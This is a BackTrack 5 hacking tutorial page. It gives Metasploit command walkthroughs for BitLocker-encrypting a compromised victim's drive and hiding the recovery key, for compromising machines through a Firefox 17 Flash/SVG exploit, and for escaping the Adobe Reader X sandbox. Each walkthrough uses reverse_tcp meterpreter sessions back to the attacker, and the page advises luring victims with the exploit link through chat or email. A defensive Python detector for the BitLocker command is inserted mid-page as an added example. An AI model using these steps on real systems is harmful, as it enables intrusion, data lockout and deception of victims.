BackTrack 5 Tutorials

How to Encrypt Drive of Remote Victim PC


First hack the victim PC using Metasploit (Tutorial: How to Hack Remote PC).

Once you have a meterpreter session, use the ‘shell’ command to get a command prompt on the target.

Type manage-bde -status and press Enter.

Run the following command to enable BitLocker on the desired drive (in my case the g: drive), store the recovery key in c:/windows/system, and generate a random recovery password:

manage-bde -on g:  -RecoveryKey c:/windows/system  -RecoveryPassword
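For defenders, the command above leaves a recognisable command line in process-creation logs. The following is an added example, not part of the original tutorial: it flags manage-bde -on invocations and raises the severity when the recovery key is written under the Windows directory. The sample command lines, function names and severity labels are constructed assumptions.

```python
import ntpath
import re

# Constructed command lines, as a process-creation log would record them.
SAMPLE_EVENTS = [
    "manage-bde -status",
    "manage-bde -on g:  -RecoveryKey c:/windows/system  -RecoveryPassword",
    r"manage-bde.exe -on D: -rk F:\ -rp",
    r"notepad.exe C:\notes\manage-bde.txt",
]
KEY_FLAGS = {"-recoverykey", "-rk"}
PWD_FLAGS = {"-recoverypassword", "-rp"}
SYSTEM_DIR = re.compile(r"^[a-z]:\\windows(\\|$)")  # assumed default Windows directory

def _value_after(tokens, names):
    """Return the argument that follows any flag in `names`, or None."""
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in names and not tokens[i + 1].startswith("-"):
            return tokens[i + 1]
    return None

def classify(cmdline):
    """Return a finding for a BitLocker enable command, else None."""
    tokens = cmdline.replace('"', "").split()
    if not tokens or ntpath.basename(tokens[0]).lower() not in (
            "manage-bde", "manage-bde.exe"):
        return None
    lowered = [t.lower() for t in tokens]
    if "-on" not in lowered:
        return None  # -status and other queries do not change the volume
    volume = _value_after(tokens, {"-on"})
    key_dir = _value_after(tokens, KEY_FLAGS)
    norm = key_dir.replace("/", "\\").lower().rstrip("\\") if key_dir else ""
    return {
        "volume": volume.upper() if volume else None,
        "key_dir": key_dir,
        "password_protector": any(t in PWD_FLAGS for t in lowered),
        # A key left in a system directory matches the command shown above.
        "severity": "high" if SYSTEM_DIR.match(norm) else "review",
    }

def scan(events):
    """Pair every flagged command line with its finding."""
    return [(e, r) for e in events if (r := classify(e)) is not None]

if __name__ == "__main__":
    for cmd, finding in scan(SAMPLE_EVENTS):
        print(finding["severity"], finding["volume"], cmd)
```
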

Best of Social Engineering Toolkit Attack


Bypassing Antivirus using Multi Pyinjector Shell Code Injection

Browser Autopwn Attack

Web Jacking Method

Create a Payload and Listener Attack

Infectious Media Generator Attack

Tab Napping Attack Method

Powershell Attack Vector Method

RATTE (Remote Administration Tool) Attack Method

PyInjector Shellcode Injection Attack 

Hack Windows, Linux or MAC PC using Firefox 17.0.1 + Flash Privileged Code Injection


This exploit gains remote code execution on Firefox 17.0.1 and all previous versions provided the user has installed Flash. No memory corruption is used. First, a Flash object is cloned into the anonymous content of the SVG “use” element in the <body> (CVE-2013-0758). From there, the Flash object can navigate a child frame to a URL in the chrome:// scheme. Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper around the child frame’s window reference and inject code into the chrome:// context. Once we have injection into the chrome execution context, we can write the payload to disk, chmod it (if posix), and then execute. Note: Flash is used here to trigger the exploit but any Firefox plugin with script access should be able to trigger it.

Exploit Targets

Firefox 17.0.1

Windows PC

Linux PC

MAC OS X PC

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open a BackTrack terminal and type msfconsole

Now type use exploit/multi/browser/firefox_svg_plugin

msf exploit (firefox_svg_plugin)>set payload windows/meterpreter/reverse_tcp

msf exploit (firefox_svg_plugin)>set lhost 192.168.1.167 (IP of Local Host)

msf exploit (firefox_svg_plugin)>set srvhost 192.168.1.167 (This must be an address on the local machine)

msf exploit (firefox_svg_plugin)>set uripath / (The Url to use for this exploit)

msf exploit (firefox_svg_plugin)>exploit

Now you have a URL to give to your victim: http://192.168.1.167:8080/

Send the link of the server to the victim via chat, email, or any social engineering technique.

Now you have access to the victim's PC. Use “sessions -l” to list the sessions, then type “sessions -i ID” with the session number to connect to the session.

Hack Remote Windows PC Using AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass

This module exploits a vulnerability in the Adobe Reader X sandbox. The vulnerability is due to a sandbox rule that allows a Low Integrity AcroRd32.exe process to write registry values, which can be used to trigger a buffer overflow in the AdobeCollabSync component and so obtain Medium Integrity Level privileges from a Low Integrity AcroRd32.exe process. This module has been tested successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.

Exploit Targets

Adobe Reader X 10.1.4

Windows 7

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

First hack the victim PC using Metasploit (Tutorial: How to Hack Remote PC).

Once you have a meterpreter session, use the ‘ps’ command to display a list of running processes on the target.

Migrate to the AcroRd32 sandboxed process

Now type use exploit/windows/local/adobe_sandbox_adobecollabsync

msf exploit (adobe_sandbox_adobecollabsync)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_sandbox_adobecollabsync)>set lhost 192.168.1.2 (IP of Local Host)

msf exploit (adobe_sandbox_adobecollabsync)>set session 1

msf exploit (adobe_sandbox_adobecollabsync)>exploit
